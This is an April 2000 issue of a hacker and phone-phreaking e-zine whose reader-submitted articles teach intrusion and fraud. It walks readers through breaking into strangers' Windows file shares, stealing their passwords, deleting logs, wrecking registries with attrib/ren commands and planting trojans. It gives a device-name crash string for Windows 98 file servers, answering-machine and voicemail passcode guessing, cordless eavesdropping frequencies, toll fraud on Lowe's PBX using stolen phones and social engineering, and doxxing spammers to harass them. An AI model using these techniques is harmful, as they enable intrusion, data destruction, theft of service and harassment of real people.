United Phone Losers
issue no. 18 - April 20, 2000
this issue edited by Rufus T. Firefly

in this issue
Written by Rufus T Firefly

Here we are, another exciting-packed UPL issue.  Lots of things have happened since last we spoke.

First and foremost, I must impart the sad news that our beloved nawleed is no longer with us.  As revealed by one White Box Willy below, even we anarchistic underground street-gangs of the information superhighway are not without our particular blend of complex politics.

Second, you probably asked yourself while downloading this, "Self, isn't this issue unusually huge?"  And the answer is a loud and clear "Hell, yes it's huge!"  It's our UPL super special motherfucker issue.  Don't print this one out without spare el-cheapo printer-warranty-voiding ink-cartridge-refilling kits, folks.  Over seventeen bits and pieces from various corners of the continuum came together to form this issue, not the least of which is a huge update on RedBoxChiliPepper's Network Solutions article from UPL 017. Yes, we are happy to report that it is easier than ever for your average drooling idiot to screw with other people's domains with little or no risk. Thanks, Jolly Spamhead!  We've also got a couple of nuggets from textphile-veteran The Mob Boss, along with some truly vital information from our good pals spyg0ddess, Nitephreak, and more.  Day-amn!

Thirdly, you may well ask "Isn't this that Firefly jeroff editing the zine again?"  Yes, you may well ask that, and well you may.  Because I am, since poor old linear is still dead.  Fortunately, he was able to send in a couple of articles, since we replaced his keyboard with a Ouija board.

And another of my dreams has come true... thanks to JJ, we now have an official UPL recipe!!!  And it involves lots of fire, which is cool.  Kids, TRY this at home!!!  Don't you DARE ask your parents!!!  Wheee...

--- by Rufus T. Firefly

SCANDAL! Nawleed Booted From UPL!
Written by White Box Willy

As most know, nawleed was recently kicked out of UPL for reasons unknown. Unknown, until now that is! Yes, I, White Box Willy, the man behind the scenes, am here to tell you all about the tragic day, when linear lost his mind, and nawleed lost a shoe.

There we were, me, linear, and nawleed, chilling in #jen (linear insists we hang out in there every time he goes on IRC). Nothing unusual, the normal conversation...

<wBw> So, linear, what's new?
<linear> nothing at all. i hate my girlfriend.... blah
<nawleed> why don't you just dump her, jackass?
<linear> because of my inability to change my station in life, remember?
<nawleed> ooooh yea. i forgotededed!@$#%
<linear> so anyways....
<wBw> can i have your girlfriend?
<linear> yea, i guess.

And so on.... Yes, this is what talking to the real linear is like. What a dumbass, eh folks? Anyway, being good friends with both linear and nawleed, i decided to ask some personal questions....

<wBw> hey nawleed, don't you ever get tired of being linear's bitch?
<nawleed> why, whatever do you mean, White Box Willy?
<linear> HEY!
<wBw> Well, i mean, linear really takes advantage of you.... i mean, look at
 all you've done for UPL, and do you ever get credit? a thank you? NO! Just a
 slap on the ass and another chore!
<nawleed> hey... you're right...
<linear> DON'T LISTEN TO HIM YOU WHORE! You love being part of the UPL
 collective conciousness and you know it! Now get back to making the new UPL
 brand shoes. I want them double-stitched!
<nawleed> COLLECTIVE CONSCIOUSNESS?!@#$% More like you making the rest of us
 your jail-bitches and doing your shit work as you get all the women, money
 and power! I'm sick of it dammit! TO HELL WITH THE UPL SHOES!
<nawleed> FUCK YOU, LINEAR! You vegeterrian fuck-face! You god-damn granola-
<linear> Goddammit! That's it mother fucker! YOU MEAT-EATING BITCH! YOU'RE
<wBw> uhm, guys...
<nawleed> good! i'm sick of your shit anyways! you tyrannical overlord JEROFF!
*** nawleed has left #jen
*** linear sets mode: +b *!*@xxxxx.xxxxx.xxxx.com

And so you see, I made a joke and it went too far. Me and linear don't talk much anymore, and linear and nawleed can no longer stand one another. Me and nawleed don't talk much either, come to think of it. Sometimes i sit alone in my bed at night and cry. Surely, I'm going to hell for what I've done.

--- by White Box Willy

Ewe Pee El Sux0rs!!@#$%#
Written by linear

"UPL sucks, linear. You think I'm joking, but serious - UPL really does suck"

So for over a year now, I've been doing UPL. Numerous times, I've told people openly that UPL sucks. I don't think I know anyone who mocks UPL more than me. But for some reason, people still feel obliged to remind me that UPL sucks. I know UPL sucks, dammit! You can stop telling us! But, perhaps this subject needs to be examined a little more closely...

UPL first started as a joke. A cheap PLA knock-off that was never suppose to be taken seriously. But before I knew it, UPL gained a large following, gets its own domain, and is all the sudden something very legitimate. Weird, we all thought, but we sat back and enjoyed the ride anyway.

Of course, as can be expected, with all of UPL's newfound popularity came a whole lot of people who hate us. Some hate us because we disgrace the PLA name. Some hate us because much of our information is lame and/or newbie related. Some hate us because we just flat-out suck. All true. But now that the UPL files have taken on a 'zine format, and large majority of the content is reader-submitted, it's no longer entirely our fault that it sucks. It's your fault! If our zine sucks so bad, it's because you're submitting shitty articles, or, more likely, you're not submitting anything at all. So if there's something you'd like to see in UPL, then by all means, send it in! Otherwise stop bitching about it. The only way UPL will improve is if your submissions improve!

UPL doesn't suck! YOU suck!!

--- linear

Windows File-Sharing Exploiting
Written by Jolly Spamhead

So you're sitting there bored surfing the web looking up dinosaurs and gay porn and decide you want to try out some basic hacking but you don't know where to start? Well now you do. This is a simple hack that anyone can do...even a phone loser. =)

First, you need to get yourself a real domain scanner that will allow you to scan for a certain port. No not the shit Proggys the 31337 Mirc kiddies downloaded from www.warforge.org to sit next to their trojan infected winnuke programs. No go get Ostrosofts Internet Tools located at www.ostrosoft.com for this evil purpose. Set it to scan a domain to find a open port 139 and then save a list of those ips that it finds. If you need help finding a domain to scan, load up IRC and head to #chatzone or #teen and do a /who #(channel). Find a domain that looks interesting and a easy target and type /dns (domain). Next copy and paste that domain into Ostrosoft and set it to scan the entire domain. Depending on your connection, you are bound to have about 30-40 computers with port 139 open on any given domain. Next goto to the START/RUN.....and type

nbtstat -A ip <---- IP With port 139 open

Run that command on each IP with port 139 open to see if file sharing is enabled <20>. Once you finally find a computer, and I know you will (trust me over 10% internet users leave it on). Goto Start/Find/Computer/ type in "\\xxx.xxx.xxx.xx". If the file sharing is not password protected that person's shared drive will pop up on your computer. If the server is password protected, don't even fuck with it as your ip will be logged, just move on. Since you now have the access to the person's shares, the C drive hopefully, you can have some power at your hands.


I guess the "Right thing" to do is to let the person know you were there and how you got in... I usually do this by leaving a text file on their desktop, or by finding the ICQ/AIM directory and getting their ICQ number and sending them a message. BUT! Not before going into their mirc.ini file and stealing their nickserv or chanserv passwords for personal use! *GRIN*

If they are running a port sniffer they have already logged your IP address.. find the sniffer files and delete them as quickly as possible. Also, find the log file (nuke nabber keeps it on the desktop as nn.txt and also keeps a folder on the desktop named "reports" if they have selected that option) and delete those as well. You may also want to del netstat.* in their windows folder which prevents them from catching you with the netstat -A command.

In addition, if you really wanna fuck them over.

attrib windows\user.dat -r -a -s -h

ren windows\user.dat *.abc

This effectively screws their registry files and if they try to reboot they're gonna be fucked big time!

Keep in mind that any files over 100K are gonna take FOREVER to open so you don't want to try to spawn any real applications from their system. While you are there though, take a look around at the .ini files for their applications - you can find lots of good stuff in there (if they are running serv-u FTP for example, the user names and passwords are stored in plain text in the servu.ini file...which you can then download serv-u and decode their encrypted password and maybe hack a webpage the lame way.

Remember anything you place in the victims windows\start menu\programs \startup folder or win.ini "RUN=" line will run automatically next time the user loads windows - this is a good place to upload trojanized files. AkA adding "RUN= con/con" shutting down the system forever. Get creative...the world of Jolly Spamhead is yours!

Some Evil Jizz Monkey Typed this when I was chowing down on some soul food "OstroSoft Internet Tools v4.0 : Name: dlw dc Email: destructive@email.com s/n: 157678339".


B L A C K  P O W E R!

--- Jolly Spamhead

Basic Phone Security: Making and Breaking It
Written by The Mob Boss

The other day I was sitting in class and I was bored out of my head so I picked up a dictionary. I was curious to see how a hacker was defined, considering that seems to be one of the most passionately fought arguments, good against evil, hackers against crackers. I found the definition to be "A computer enthusiast, someone who breaks into computers". Not suprising but when I went to look for "Phreak" and "Phone Phreak", low and behold, it was not there. This seems to be common these days. Everyone is shaking in their boots about big, bad, evil hackers and what might happen to their home or business computer, but no one ever stops to think about the phone system. This article is not geared towards anyone specific, in fact this is just an abstract to guide all those who are interested in general security, privacy, and h/p. Whether your a small business owner, a homemaker, or an executive, there is something here that you should know, if you don't already.

Phone Phreaking can be loosely defined as the exploration and exploitation of the phone system and everything that goes along with it. Back in the 60's and 70's there was blue boxing, back in the eighties and early nineties there was red boxing, but nothing compares to the things that are here now, in the early part of the 21st century. Seems everything is hooked up to the phone system one way or another these days. People are sporting voicemail, pagers, cell phones, home answering machines, fax machines, computers hooked up to the internet, cell phones hooked up to the internet, and there are plans to have cars on the internet pretty soon as well (i.e. 2600 issue 16:4, I OWN YOUR CAR). 1984 is here, just a little late . Now considering all that why would someone ignore learning about the phone system considering the whole backbone of telecommunications is the phone system. Thet's a mistake a lot of companies and individuals make. Besides theft of phone service, as there are so many legal ways to make a free call these days, but how about privacy. How would you like someone monitoring your business via the voicemail system or maybe monitoring your house by using the remote access feature on your answering machine to actually listen in on what's  going on. How about someone tapping your analog cell phone or old cordless phone? Now from the attackers point of view, what better way to watch a target? You want to break into a computer network, monitor the voicemail systems for possible technical information and logins. You want to break into a house, listen to messages on the answering machine to find out the patterns of those who reside there. Want to blackmail, extort, and steal, well then there are tons of possibilities for you.

Lets start at home. What communication devices do you own? Cordless phone, PC, Fax machine, answering machine? I'm willing to bet you have at least one or all of those items in your home. First I will touch on answering machines, personally I could live without it. Most people hate talking on answering machines  , and when its not meant to be its not meant to be. But I still own one and the first thing I did when I learned about breaking into answering machines was to check my manual to see if my machine had remote access. As it turned out, it did have remote access but lucky for me it has a strong security policy, two bad tries will boot you off, plus the code is a good one. Now machines I have encountered in businesses and homes were as easy as dialing 123 after the tone. So what you say? You have nothing to hide? Well privacy is privacy and either way I don't want some thug hearing when I'll be at the dentist or vacation. This is twice as bad if you're a business and you have customers leave orders on the phone after hours. Credit card fraud has been booming since the 1980's and two decades later its still a problem, and its a safe bet that it always will be a problem. Here is an easy to follow system for getting into an answering machine, out of the many techniques I have read, tried, or heard of this one is the most rewarding... after the tone start dialing this sequence, 9876543210000123456789 then 2000, 3000, till you hit 9000, then 1111, 2222, and so on till you hit 9999. That technique will break into answering machines in the homes of government officials, mail order stores, and places that should be more secure. Try that on your machine or a friends (with his permission of course) and see how secure that answering machine really is.

Another problem that has been around for many years is that of people tapping cordless phones with simple frequency scanners. Now this problem has been dying out but when I flip on the Ol' Bearcat I still hear morons yacking away on there old, ten dollar, garage sale, cordless phones. These aren't wholesome conversations either. Drug deals, phone sex, and fights. I guess it all depends on where you live but just the same there are a lot of possibilities here. Like I said, this is not a new problem, but its still wide spread even though a whole decade of cordless terror has gone by. By programming the following frequencies into your scanner you'll hear many conversations:

          Base     Handset
   1      43.720   48.760
   2      43.740   48.840
   3      43.820   48.860
   4      43.840   48.920
   5      43.920   49.000
   6      43.960   49.080
   7      44.120   49.100
   8      44.160   49.160
   9      44.180   49.200
  10      44.200   49.240
  11      44.320   49.280
  12      44.360   49.360
  13      44.400   49.400
  14      44.460   49.480
  15      44.480   49.500
  16      46.610   49.670
  17      46.630   49.845
  18      46.670   49.860
  19      46.710   49.770
  20      46.730   49.875
  21      46.770   49.830
  22      46.830   49.890
  23      46.870   49.930
  24      46.930   49.990
  25      46.970   49.970

Obviously you want to listen into the base frequencies so that you hear both sides of the conversation. Now you may say well I don't have an old phone, "I have a brand new cordless phone that runs on the 900mhz band and scrambles the conversation". The only thing I have to say to that is, what if your business partner, mistress, and/or accomplice are using a old cordless phone, then your security measures mean nothing and its out there. That's why you have to analyze security from afar, missing the big picture will really screw you up.

Are you running a dialup server at your residence or small business? If you think its safe because no one but you had the dialup then you my friend are dead wrong. For years people have been using programs called war dialers (i.e. ToneLoc) to scan exchanges looking for computers and just because times have changed and the internet seems to dominate all doesn't mean that people have stopped looking to their local exchanges either. In fact much can still be found by having a war dialer go for a few hours and attackers know this. A company can have a big fancy firewall but a dialup sticking out like a sore thumb a few numbers up from their main switchboard number. That kind of ignorance can be very very costly and it would be wise to see how your computers are set up. If a dialup server is necessary be sure to pick strong passwords and keep up with a good policy for protecting that data, physically and remotely.

Lets move on to your small (or large) business. Most businesses worth anything at least have a small PBX and voicemail system, plus the kind of stuff you may have at home, as all the same of rules of home security apply at the office as well. Its very important that a person takes his sweet time with setting up the phone system, baby it just as much you would the computer network because leaving the phone system open will lead the path to your precious network. If someone gets into your phone system what do you have to lose? Privacy, valuable information about customers (credit card information), use of your lines to call Europe and what not. I must say that PBXs are more challenging now then they were ten years ago but considering most voicemail systems run hand in hand with the PBX, having weak passcodes on your voicemail system can lead to exploitation of your PBX services. Meridian Mail, which is put out by Nortel (www.nortel.com), for instance has a nice little feature where you can set the operator assistance number, which in what I have seen is local numbers, just the same it can be useful for bouncing through to avoid tracing. I don't think anyone wants their phone system used as a jumping off point for attack against something big. The same rules of breaking into answering machines applies to voicemail, but one can get more creative here. There is usually multiple accounts on a system so if you can't get into one, more onto another. 999 or 9999 is usually an administrators box and 100 or 1000 is usually a general delivery box. Its been my experience that the general delivery box can be the most influential as that's where your general information can be obtained and that's  also a very easy box to get into, a lot of the time the passcode is just 1000. In general though some passcodes to try are the number of the box as the passcode, 1234, 1111 to 9999, 1000 to 9000, the name of the person or company in DTMF, and the last four digits of the phone number. Knowing that, its possible to use these private phone networks for a lot of different things and I think its very clear why someone should take this into consideration.

Ok now that its clear that your everyday conversations are at risk lets talk about some of the ways we can insure that our distant party is the only other person to hear the conversation. Remember the only secure conversation is one in person, free of any monitoring. Getting back to the point, one must consider what level of security is needed for a conversation before they begin to put security measures in place. For instance I doubt you need to encrypt a voice conversation with your grandmother (unless she works for a three letter agency) nor do I think you want to be on that old cordless phone while buying arms from third world terrorists (not that I'm advocating that). Lets say you are interested in securing voice communication, here are some ideas on what you can do to protect your privacy. The first method is accomplished through PGPphone, a nice little program from the makers of  PGP (Pretty Good Privacy). This program allows for secure modem to modem or tcp/ip based voice communication. Using PGP keys at the strength preselected the conversation can be encrypted and secured from prying ears. Only drawback is that there is a little bit of lag and the stronger the key, the more static and breakup you will get. Another idea for shaking any taps on your phone line or your counterparts phone line is through the use of a number of payphone. If you keep a good list of payphone numbers in your area that allow for incoming calls you can be at a certain payphone at a preselected time to receive that call. If its busy you can always have a backup payphone not too far away or your contact will simply try back every two minutes. In my area at least there are still some neighborhood COCOTs (customer owned coin operated  telephone) that still take in calls. Your best bet is to call a voicemail number that has ANI every time your at a payphone. When you get home call all the payphone numbers you accumulated and see which ones take in calls. Some owned by the Telco will not allow the call to go through, some COCOTs will have a modem pick up. As another approach you could always invest in one of those expensive communication devices that hook up to the telephone and allow you to call another telephone with the device. The price is definitely a drawback ($500 area) so using one of the less expensive methods is most likely the best way to go). Be creative and use your common sense, doing that you'll come up with many creative ideas.

This was meant simply as a primer to phone security. Yes these are old problems but they needed to  retouched on because it seems many people are still mystified by simple phone phreaking techniques. There are other phone risks, such as beige boxing and social engineering, but those topics have been covered already in some very well detailed articles that are available on sites all over the internet and fine BBSs like Ripco. I hope this has opened your eyes to the dangers out there or at least refreshed your memory. And to cut off all those flames that I ripped this information off and what not, I have spent many hours on the phone testing and perfecting these techniques, there is nothing here that I don't have first hand knowledge of. I'd like to leave off with these words that good friend recently told me, "When you take from one its plagiarism, but when you take from many its research.".


Phreaking Info

Special Thanks To...

--- The Mob Boss

Spelling Lesson
Written by spyg0ddess

here's my lesson for the day when typing something to spyg0ddess, the nick is
as follows

  • small s
  • small p
  • small y
  • small g
  • a zero (0)
  • small d
  • small d
  • small e
  • small s
  • small s

thank you for your time, i hope you all found that informative.

--- spyg0ddess

IRC Log Happy Fun Time Land
Written by Various Artists

IRC users can crash IRC Fserves on Windows 98.* systems at will using special crafted path-strings that refer to device drivers being used. Upon parsing this path the Ms Windows OS will crash leaving no other option but to reboot the macine. With this all other running applications on the machine will stop responding, crashing the fserver as well. =)

Problem Description
When the Microsoft Windows operating system is parsing a path that is being crafted like "c:\[device]\[device]" it will halt, and crash the entire operating system. 

Four device drivers have been found to crash the system.  The CON, NUL, AUX, CLOCK$ and CONFIG$ are the two device drivers which are known to crash. Other devices as LPT[x]:, COM[x]: and PRN have not been found to crash the system. 

Making combinations as CON\NUL, NUL\CON, AUX\NUL, ... seems to crash Ms Windows as well.

     These are specified in IO.SYS and date back from the early Ms Dos days.
Here is what I have found.  Here is a brief list;

  CLOCK$       - System clock
  CON          - Console; combination of keyboard and screen to handle input
                 and output
  AUX or COM1  - First serial communicationport
  COMn         - Second, Third, ... communicationport
  LPT1 or PRN  - First parallel port
  NUL          - Dummy port, or the "null device" which we all know under
                 Linux as /dev/null.
  CONFIG$      - Unknown

Any call made to a path consisting of "NUL" and "CON seems to crash routines made to the FAT32/VFAT, eventually trashing the kernel.

It seems that the Windows98 kernel is going berserk upon processing paths that are made up of "old" (read: Ms Dos) device drivers.

Reproduction of the problem

<Bknight17> [v2.3b] Fserve Trigger: !Porno  Ratio: 1:5  Start Credit: 50000
  Offering: Type !Porno for all your porn needs. Ratio 1:5 and 50000 starting
  [ 5 of 7 slots in use ]

DCC Chat session
Client: Bknight17 (
Acknowledging chat request...
DCC Chat connection established
<Bknight17>  Panzer Fileserver v2.3b
<Bknight17>  Special Commands:
<Bknight17>  Credit  Your Current Credit
<Bknight17>  Mstat Your Stats On This Fserve
<Bknight17>  Fstat This Fserve's Stats
<Bknight17>  Top10  10 Most Downloaded Files
<Bknight17>  Dn10  10 Best Users - Downloads
<Bknight17>  Up10  10 Best Users - Uploads
<Bknight17>  URL  Download sites of PaNzEr
<Bknight17> Current Credit: 50000 Ratio is: 1:5
<Bknight17> mIRC32 v5.61 File Server K.Mardam-Bey
<Bknight17> Use: cd dir ls get read help exit
<Bknight17> [\]
<Jspamhead> get /nul/con
<jspamhead> dir
<jspamhead> Bye Bye Pervert!!
DCC session closed

(2 seconds later in the channel)

*** Bknigh17 has quit IRC (Read error: Connection reset by peer)

This backdoor at this point in time gives any idiot the ability to slow down or if not stop productivity in Porn, Rom, MP3 and others channels running Fservers. Simply by disconnecting all the unpatched fserves in the channel!

 Don't run a windows based fserve on IRC or try installing the patch from micro$oft. Doubt the patch works though! ;)

Initial "con" bug found in Internet Explorer by Suigien -*- Remote Crashing using FTPd, HTTPd, EMail, Usenet by Zoa_Chien Path0s, Necrite, Elias and ToSH -*- Byte hack IO.SYS workaround by Zoa_Chien -*- Advisory, IO.SYS exe/testing and aux/nul/clock$/config$ detection by vorlon.

--- Jolly Spamhead

The Lost Art Of BBSing
Written by The Mob Boss

The 80's are forever remembered in our hacking and phreaking history as the good old days. Times of wide spread knowledge, great ezines, terrific research, and most importantly the time of BBSing. Bulletin Board Systems were the way most hackers and phreakers learned great things. Many started as newbies and by the end were experts assisting other newcomers. But those days are over, the great boards of yesteryear are nothing more but ANSI filled memories right? Wrong. Believe it or not, here in the year 2000 BBSing is not dead. Of course its not what it used to be, but its something for us who missed those days can look at and enjoy. In fact I maintain a growing list of BBSs around the world, telnet and dialup boards in fact. Some great discussions are held on these boards every day, from California to Germany, some people are still keeping the BBS scene alive. This article is meant as a guide for dialing/telneting to these boards, how to get around once your on, and proper etiquette. This article is geared for those with Windows 95/98, sorry to you UNIX folks but I am not familiar with the terminal programs for it.

Lets get started. The terminal program we are going to use is hyperterminal because if you are running windows you already have it. To start it up go to Start -> Program Files -> Accessories -> Communications -> Hyperterminal. Run hypertrm.exe and it will bring up the program with a new connection window. Name it whatever you like, use whatever icon. Now the connect window will pop up. Now the question is, "What kind of board are you connecting to?". For now I will assume you are connecting using your modem, hence a dialup BBS. Now since whatever dialup BBS you are calling is most likely long distance, I am going to explain how to set this up so that you can do whatever you have to do to make the call and not connect until the number of the BBS is actually ringing. Since you'll be using the operator assisted dial feature it doesn't matter what area code and number you put in, but to keep things neat you might as well put in the number of the BBS. If you don't trust me or yourself and don't want to accidently be calling Germany directly then just stick in your home phone number, so that if the operator assisted dial feature was forgotten to be checked it will simply get a busy signal. Also make sure you have selected your modem on the pull down menu "Connect Using:". Now you will have a connect window once you hit ok. Now lets go to modify. This will put you in the Properties window. Click configure which is located under the "Connect To" tab. Now first I suggest you turn up the modems speak volume if you usually don't. Like a mechanic with a car, listening to a modem can tell you a lot. Under the "Connection" tab, it should read Data Bits 8, Parity None, and Stop Bits 1. Now go to the "Options" tab, check off Operator Assisted Dial. Hit Ok. Then hit Ok on the properties window. This will bring you to the "Connect To" window again. Now when you hit dial a new window will come up, "Manual Dial". Now simply pick up the reciever, do whatever you plan on doing. Hopefully you'll be legally calling your legally bought prepaid calling card (hehe). Once the BBS number is ringing hit Connect on the manual dialing window and hang up the handset. You may hear another ring or two through the modem speaker but when it picks up your modem should connect to the BBS. This seems to be better the instructions by MS to wait until the BBS picks up to hit connect and hang up. Now if all goes well then you should be greeted by an exciting ANSI opening screen with instructions for opening a new account. If not just put in the handle you want, when it then says that you are not from the board, it should prompt you to open up a new account. Now if you weren't able to connect, keep on trying. Many things can go wrong. You may have made a mistake in dialing, linenoise could have prevented the connection (that will happen a lot of transatlantic calls or ones that make a lot of hops through different systems), or possibly the BBS had a problem.

Now for those who rather not be calling Europe all the time the telnetable BBSs may be a better choice. Some are text based, some are ANSI-based. So to connect to one of these babies, start up a new connection as we did earlier. This time though rather then selecting your modem, select TCP/IP (Winsock). I have heard conflicting stories of some versions not having this. If not then try upgrading. When you select TCP/IP you'll be presented with a box asking for the host and port. Enter those in and hit connect. Viola your connected.

Ok so now we are sitting at that ANSI screen. What do we do? Well we sign up for a new user account. Procedures vary. Boards like Sacrifical Lamb and L0pht will give you immediate access. Boards like this have several discussion boards, mail, and real-time chat. Boards like Subcultural Niche for instance in Denmark however are more old fashioned in their procedure. Once you fill out the new user information form you'll have to wait to be granted full access which includes, discussion boards, mail, files, chat, BBS Lists, etc. Usually access is granted within 24 hours. Now when filling out the form it asks a lot of information. Name, address, voice number, data number, so on and so on. For your name put your handle, for address feel free to put your city and state, but don't feel obligated to put your street address. As for voice number there is no reason not to have a number to give them. With the abudance of free voicemail and fax numbers these days, I'm sure everyone has a number they can give. If you are giving a test on acronyms or they ask questions like "Why should we grant you access", just be sincere. Don't bug out if you don't know all the answers but make a habit of finding out what the answers were, thats what learning is all about. If you weren't granted access for some reason, feel free to find out why but don't dwell on it or get angry, probably wasn't worth being apart of anyways. Being turned down is pretty rare though so as long as you don't say, "i aM h3R3 f0r y0 wAr3Z f00l5" then you should be fine.

Once you have access to a board, look around, read the help files so you learn how to move around the board with ease. Most boards have the same commands or similar ones so once you learn one or two you'll be all set. Set up your file transfer protocol the first time you upload/download something. Zmodem is probably what you wanna go with since its pretty automatic. When you first get on the board with a file area its polite to upload a few good texts that you have. Don't upload crap, upload things that you read and truly enjoyed or learned from. Some boards have ratios so uploading is not just curteousy but nessecary if you want to download anything. For those who do not know how to send a file, simply go to the upload menu following the prompts. When its ready for you to send the file just go to transfer, send file, and choose the file you want to send. Again reading the help files will help a great deal in manuevering around the board. Once you uploaded a few files and had a chance to look around, introduce yourself to the sysop or if he's not online post a message introducing yourself. Lurking around makes people suspicious and resenting of you. If you can answer someones question, go for it. Don't get involved in flame wars if you can withstand the urge. And always treat the BBS as you would your own system. Crashing BBSs or trying to break into them is very retarded, very few are around so breaking the few we have is not only wrong but retarded.

Again this is simply an introduction and wake up call to all those who thought BBSs were dead. They are alive and they are great. I have learned a great deal from boards like Sacrifical Lamb and Ripco. At the end of this file is a list of BBSs I currently know of that are alive. However for an up to date list check out http://come.to/mobdomain. Now once you get into BBSs a bit and see whether or not you enjoy them, consider opening one yourself. All that is required is a server with decent uptime or a spare phone line. If you can spare the time and resources go for it. Its a damn shame that there are no dialup BBSs in North America and few telnet boards. If you do decide to open one let me know and I'll assist in any way I can. Thanks to all those Sysops who helped me in my quest for BBSs and to all those who have take the time to keep this great art going.

Special Thanks To Deo, Glock, And Tron

Visit These Fine Bulletin Boards...

Ripco BBS

Northland Underground BBS

L0pht BBS

The Sacrifial Lamb
Login as BBS

Post Cards From the Edge
Login as BBS

Subcultural Niche

Freedom Fortress

Perpetual Illusion

Euphoric illusion

West BBS

Voodoo Lounge
lounge.myip.org (Not 24/7)

Virtual Distortions

Death Chamber
excidium.wolfsburg.de port: 666
System Password: exmrocks


Fuct Image

--- The Mob Boss

The Shower Exploit
Written by Nitephreak

Tell me, how many times have you wished: "I wish I could truthfully say I shower everyday but not have to put up the recent fads of self hygiene." well too many if you ask me. I give you the shower exploit for Hackers on the go.

When you shower, start at 11:55 pm so it lasts until after midnight and technically you've showered on both days, so no matter how much you reek, you shower daily.

Coming soon
  • The deodorant exploit
  • The tooth brushing exploit
  • The hair combing exploit
  • The ass wiping exploit
  • The laundry exploit

"No time, no problem!"

--- Nitephreak

Penetrating Lowes' PBX
Written by Reverend Dope Hat

Now many of you may be asking yourself, "What the hell is Lowes?" For those of you that don't know, Lowes is a Home Improvement Store very similar to Home Depot.  What separates Lowe's from other stores is that their workers carry around Spectralink phones all hooked into their store PBX system.

So just how in the hell do you get into this PBX? Well there are various ways you could go about doing this. First, you could simply buy a Spectralink phone and go to Lowe's parking lot and link into their PBX. Now I'm not sure if the phones have to be programmed to hook into a certain PBX, but if they do, contact Spectralink and tell them that you are a manager at Lowes and your phone got stolen and you need a replacement. If they ask for an extension number tell them it's any number ranging from 800-805. (800-805 are the store manager's numbers.)  Or you could simply get a department phone. The extensions are all listed at any cash register or phone in Lowe's. Just swipe the sheet for reference.

Now, when you're ordering your Spectralink phone you'll also need a battery and a charger to keep the phone going. Remember though that simply ordering the phone is an expensive way of going about the whole thing.

I suggest simply stealing one of the phones. Many workers just simply leave them lying around store and it's a sure bet if you walk around the store long enough that you'll find one somewhere.  Also if someone isn't in the store that day you could probably find their phone laying at the service desk. Getting the phone there could be a problem. Store management usually hangs out around the service desk. It would probably be a good idea if you just walked around the store in search of a vacant phone. As I said before, you can usually find them laying around.

However you go about it, you have to have one of these Spectralink phones to break Lowe's PBX.  Once you have one of these phones with a battery equipped, take your ass to Lowe's parking lot and try to remain unseen with your phone. Service through the PBX should still be accessible in the lot. I have yet to figure out how to modify the phone to amplify the antenna further, but I am working on it.

Ok, so you're in the parking lot? Now what? Well, press START on the phone and you have a dial tone. Now press 9 and you have access to the outside line. WOO HOO! You have access to all local calls on Lowe's line. Local Calls? Local Calls you say? SCREW THAT!

Well, getting access to the PBX long distance codes will require some social engineering on your part. Stay in the parking lot and call 801-804 till you find a manager that is in. Exclude 800 and 805, because this is the store manager and co-manager and they usually know everyone in the store.

When you get someone on the line, tell them that you need to call back someone about an installation or something of the sort and your long distance dial out pin isn't working and that you need a new one. Most managers are so damn stupid that they won't even think about it and will give you the info you need to dial out long distance. If it doesn't work though, go back to your extension sheet and call random departments till you find someone who does know the pin.  The pin will be 5 digits. You hit 9, get a dial tone, dial the long distance number and you'll hear a humming tone. At this point enter the pin and if the pin is valid, your call will go through.

Now be smart with the long distance dial out and don't call people you know. You could set up a conf through the line, but the operator cannot dial the line direct from outside. So simply tell her to call the store itself and to reach you at the extension phone that you have. WA-LA, a conf charged to Lowe's!

On another note Lowe's does NOT shut down it's PBX at night so you will have 24 hour access to PBX.

Another fun thing to do would be to get on Lowe's PA system and harass the hell out of them. The number for Lowe's PA is 89. Simply dial 89 on your Spectralink Phone and harass till your heart's content.  Or you can forward people you know long distance phone calls. As I stated before though, I wouldn't call people's houses that i know. So what do you do? Tell your friend to go the payphone and call him up with the Spectralink phone. The conversation should go something like this:

(Ring, Ring, Ring!)

Friend: Hello, where's my free long distance phone call?

You: It's coming right up motherfucker. Settle your ass jack.

(You push Function 2 on the phone for call forwarding. Hit 9 for an outside line. Dial the full  number that your friend requested. Hear a humming noise, enter your PBX code. The line starts to ring and you press end to connect your friend to the ringing line. Wham bam, your friend has a free long distance call all courtesy of you and he will kiss your ass the rest of his life.)

Basically once you have the spectralink phone and the pbx code, the possibilites are endless.

Now this whole process will be a lot easier if you scope out the store and try to get the names of people with power in the store and what department they work in and such. It will also be easier if you actually have a friend that works in the store that would be willing to aid you in your war against Lowe's. I'm sure you can find other various things to do for fun on Lowe's PBX once you get your Spectralink Phone. Just don't be stupid and get caught while doing it. Well, I hope this article has provided you with enough info to satisfy your phreaking needs and as always happy phreaking!

--- Reverend Dope Hat

Fun With Spam
Written by Rufus T. Firefly

By now, we've all gotten these in our email.  "Make zillions of dollars by sending a dollar to each name on the list, blah blah blah..."  Basically, they're annoying spam.  But, they're also a great way to kill boredom, and school a spammer in the process.

(NOTE:  In case you didn't think of this before, hit yourself in the head with a large brick, because it's very simple and dumb and everyone knows it.  I'm just putting the idea in print because I feel like typing.)

The point of the scam requires that the spammer put his/her mailing address on the thing.  So skim through the email until you get to the part with 5 or so names and addresses.  Each and every one of those people is or was a spammer, and deserves to die of syphillis.  So, run all the names and addresses through some internet-based directories.  Try all the main databses such as infospace.com, anywho.com, whowhere.com, etc.  A really good place to start is RBCP's Private Investigator page at http://phonelosers.org/pi.html where he has swiped forms from many of the best databases.  Forget the PO boxes, you'll almost always get at least half of the spammers' real street addresses, and with those you can score some phone numbers. 

Once you have those, the rest is cake.  You could stick to the basic harassment techniques, or you could have more fun by asking them about the emails.  Act like you need further explanation of how to do it, what to write where, how to fold the dollar bills you're sending to everyone, etc.  Ask them if they're that "lawyer" who always writes that section on how it's so legal.  Or, you could shake them up by being a Postal Fraud investigator, making sure they're home so your riot squad doesn't waste a trip.

Whatever you do, you'll come out of it feeling less pissed about the spam...

--- Rufus T. Firefly

Network Solutions Triple Feature
Written by Jolly Spamhead

Network Solutions Followup and Free Domain Hosting

Seems like our good old friend Network Solutions (http://www.networksolutions.com) still doesnt give a good fuck about its good honest racist constumers as the domain www.whitepower.com was recently HiJacked and defaced. A whois lookup on the domain shows the following:

whitepower.com (WHITEPOWER6-DOM)
Hackers Against
Racist Dicks
New York, NY 31337


Administrative Contact, Technical Contact, Zone Contact:
Hicks, Roy (RHS377) nanoblaze@YAHOO.COM
421 luke street
Little Rock , AK 31337


Billing Contact:
Hicks, Roy (RHS377) nanoblaze@YAHOO.COM
421 luke street
Little Rock , AK 31337

Record last updated on 26-Mar-2000.
Record created on 03-Apr-1999.
Database last updated on 29-Mar-2000 14:20:16 EST.

Domain servers in listed order:

